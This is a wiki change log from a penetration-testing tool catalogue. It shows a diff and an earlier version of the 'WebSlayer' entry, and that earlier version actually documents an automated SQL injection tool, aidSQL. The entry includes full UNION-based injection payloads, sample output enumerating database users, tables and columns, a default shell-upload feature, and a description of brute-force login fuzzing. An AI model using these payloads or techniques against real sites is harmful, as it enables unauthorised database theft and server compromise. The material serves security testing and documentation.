Recent changes to WebSlayer-en

WebSlayer-en modified by Maguey

Maguey — Thu, 12 Dec 2013 19:59:36 -0000

--- v1
+++ v2
@@ -14,44 +14,37 @@
 

 Description: 
-Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.
+Tool that performs brute force attack combined with fuzzing techniques, thus enabling the exploitation of vulnerable parameters and headers through POST and GET methods.

 

 Objective:
 
-Automated detection of parameters vulnerable to SQL Injection.
-
Automated and configurable data base data mining.
-
Automated shell upload in order to comprise the application server.
+
Exploit vulnerabilities present on web application through fuzzing techniques.
 

 

 Features:
-Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.
+Supported technologies: Web applications (HTTP/HTTPS).

 Operative mode: Active.

 
-Automated detection of parameters vulnerable to SQL Injection.
+Exploit vulnerabilities present on web application through fuzzing techniques.
 

-Automated parameter tampering for both URL parameters (GET) and form data (POST).
-
Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
-
Provides the name of the parameter and URL from the detected vulnerabilities.
+
Support for both basic and NTML authentication.
+
Offers 15 different coding types.
+
Support for session management.
+
Customizable payloads:
+
+Regular expressions.
+
Range of words.
+
Permutation of characters.
+
Logins from people's names.
+
Credit Card numbers.
 
-

-
-
-Automated and configurable data base data mining.
-

-Retrieves the following information 
-
-Database user name.
-
Database name.
-
Database version.
-
Database tables.
-
Database tables schema: keys, fields names and type.
-
+
Capabilities to perform a separated fuzzing over two different parameters with different list of words.
 
 

@@ -66,164 +59,26 @@
 

 Basic usage:
-Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.
-
-
-./aidSQL --url=[URL] --no-shell
-


+Perform a brute force attack on a web application login page. Start the tool and on the “Applications” menu provide the following information:

 
-Dónde:
 

---url: Web application URL address. 
-
--no-shell: Disabled the option to upload a shell. 
+
Web application login URL address.
+
HTTP headers to be included on the petition.
+
Parameters to be sent along the petition either through GET/POST method.
+
List of word to be used in the brute force attack.
 
 

-Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.
+Include the fuzzer identifier “FUZZ” or “FUZ2Z” on the required parameters to be included on the brute force attack.

-The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.
+Once the configuration is done, press the “Start attack” button to initiate the brute force attack. In the progress bar will be displayed the status of the attack for the number of word being tested and the remaining ones.

-
-Normalized URL: http://midominio.com.mx/miaplicacion/

-

-Crawling ...

-

-Fetching content from http://midominio.com.mx/miaplicacion/

-

-200 OK

-

-TOTAL URL's found: 55

-

-Add file index.jsp ...

-

-Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html

-

-Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"

-

-Parsing previously crawled URL, looking for new parameters

-

-Adding new parameter "do"

+When the attack finishes, on the progress bar will be displayed the message “Attack finished OK”.
+The results will be displayed under each one of the list of words, including the results which were successful at accessing the web application.

-


+On the “Logs” tab additional information will be presented such start and end of the attack, list of words used for the attack, URL, etc.

-This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.
-
-
-Testing links ...

-

- 1. { http://midominio.com.mx/miaplicacion/index.jsp } 

-

-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp 

- Set method GET …

-

-Load sqli => mysql5 ... OK 

-

-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome

-

-sql injection plugin...

-

-[1][ [message] | METHOD: unionQuery

-

-[QUERY]    | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*

-

-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A 

- [WW] WARNING: GOT 403

-

- [2][ message] | METHOD: unionQuery …

-
-


-
-During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.
-
-
-Site is vulnerable to sql injection!

-

-Skipping calling plugin's get shell method

-

-Fetching database user ...

-

-[message] | METHOD: unionQuery

-

- [QUERY]   | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --  
-Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
-

-FOUND DATABASE seguridad 

-[message]  | METHOD: unionQuery

-

-[QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; -- 
-

-Normalized URL: 

-http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
-

-Fetching table "cuentas" columns ...

-

-[message]  | METHOD: unionQuery

-

-[QUERY]    | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5 
FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; -- 
-

-Normalized URL:
 
-http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php
-


-
-When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.
-
-
-VULNERABLE LINKS FOUND : 1

-TOTAL TIME         : 53 seconds

-


-
-La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna: 
-
-Folder /logs/\[application name\]
-
Log file - index.php_console.log
-
XML file - index.php_db_schemas.xml
-
-
-index.php_console.log file example:
-
-
-HOST midominio.com.mx
-------------------------------------

-PLUGIN NAME        :   UNION

-PLUGIN AUTHOR      :   Juan Stange

-REQUEST VARIABLES  :   message, do, info, page,…

-VULNERABLE LINK        :   http://midominio.com.mx/miaplicacion
/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+ 

-------------------------------------------------

-SCHEMA seguridad

-------------------------------------------------

-VERSION : 5.5.16

-DATADIR : 

-

-TABLE cuentas

----------------------

-type       :   BASE TABLE

-engine     :   InnoDB

-collation      :   latin1_swedish_ci

-increment  :   1

-

-COLUMNS

----------------------

-NAME       :   cid

-       type        int(11)

-       key     0

-       extra       0

-NAME       :   username

-…

-
-


-
-index.php_db_schemas.xml file example:
-
-
-<schemas>

-<database name="owasp10" version="5.5.16" datadir="">

-<tables>

-<table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">

-<column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>

-<column name="username"><type>text</type><key>0</key><extra>0</extra></column>

-…

-

WebSlayer-en modified by Maguey

Maguey — Thu, 12 Dec 2013 19:33:07 -0000

Back Español

WebSlayer

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

Objective:

Automated detection of parameters vulnerable to SQL Injection.
Automated and configurable data base data mining.
Automated shell upload in order to comprise the application server.

Features:

Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

Operative mode: Active.

Automated detection of parameters vulnerable to SQL Injection.

Automated parameter tampering for both URL parameters (GET) and form data (POST).
Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
Provides the name of the parameter and URL from the detected vulnerabilities.

Automated and configurable data base data mining.

Retrieves the following information
- Database user name.
- Database name.
- Database version.
- Database tables.
- Database tables schema: keys, fields names and type.

Reports:
Output reports: ✔

Merge report from the exploitation and data mining in TXT and XML format.

Basic usage:

Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.

./aidSQL --url=[URL] --no-shell

Dónde:

--url: Web application URL address.
--no-shell: Disabled the option to upload a shell.

Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.

The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.

Normalized URL: http://midominio.com.mx/miaplicacion/

Crawling ...

Fetching content from http://midominio.com.mx/miaplicacion/

200 OK

TOTAL URL's found: 55

Add file index.jsp ...

Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html

Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"

Parsing previously crawled URL, looking for new parameters

Adding new parameter "do"

This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.

Testing links ...

1. { http://midominio.com.mx/miaplicacion/index.jsp }

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
Set method GET …

Load sqli => mysql5 ... OK

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome

sql injection plugin...

[1][ [message] | METHOD: unionQuery

[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*

Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
[WW] WARNING: GOT 403

[2][ message] | METHOD: unionQuery …

During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.

Site is vulnerable to sql injection!

Skipping calling plugin's get shell method

Fetching database user ...

[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; -- Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
FOUND DATABASE seguridad
[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
Normalized URL:
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
Fetching table "cuentas" columns ...

[message] | METHOD: unionQuery

[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
Normalized URL:
http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php

When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.

VULNERABLE LINKS FOUND : 1
TOTAL TIME : 53 seconds

La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna:

Folder /logs/[application name]
Log file - index.php_console.log
XML file - index.php_db_schemas.xml

index.php_console.log file example:

HOST midominio.com.mx ------------------------------------
PLUGIN NAME : UNION
PLUGIN AUTHOR : Juan Stange
REQUEST VARIABLES : message, do, info, page,…
VULNERABLE LINK : http://midominio.com.mx/miaplicacion
/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
------------------------------------------------
SCHEMA seguridad
------------------------------------------------
VERSION : 5.5.16
DATADIR :

TABLE cuentas
---------------------
type : BASE TABLE
engine : InnoDB
collation : latin1_swedish_ci
increment : 1

COLUMNS
---------------------
NAME : cid
type int(11)
key 0
extra 0
NAME : username
…

index.php_db_schemas.xml file example:

<schemas>
<database name="owasp10" version="5.5.16" datadir="">
<tables>
<table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
<column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
<column name="username"><type>text</type><key>0</key><extra>0</extra></column>
…

Resources:

Link: https://www.owasp.org/index.php/Category:OWASP_Webslayer_Project.
Author(s): Christian Martorella
Contact: owasp-Webslayer-project [at] lists.owasp.org
License: GPL v 2.0.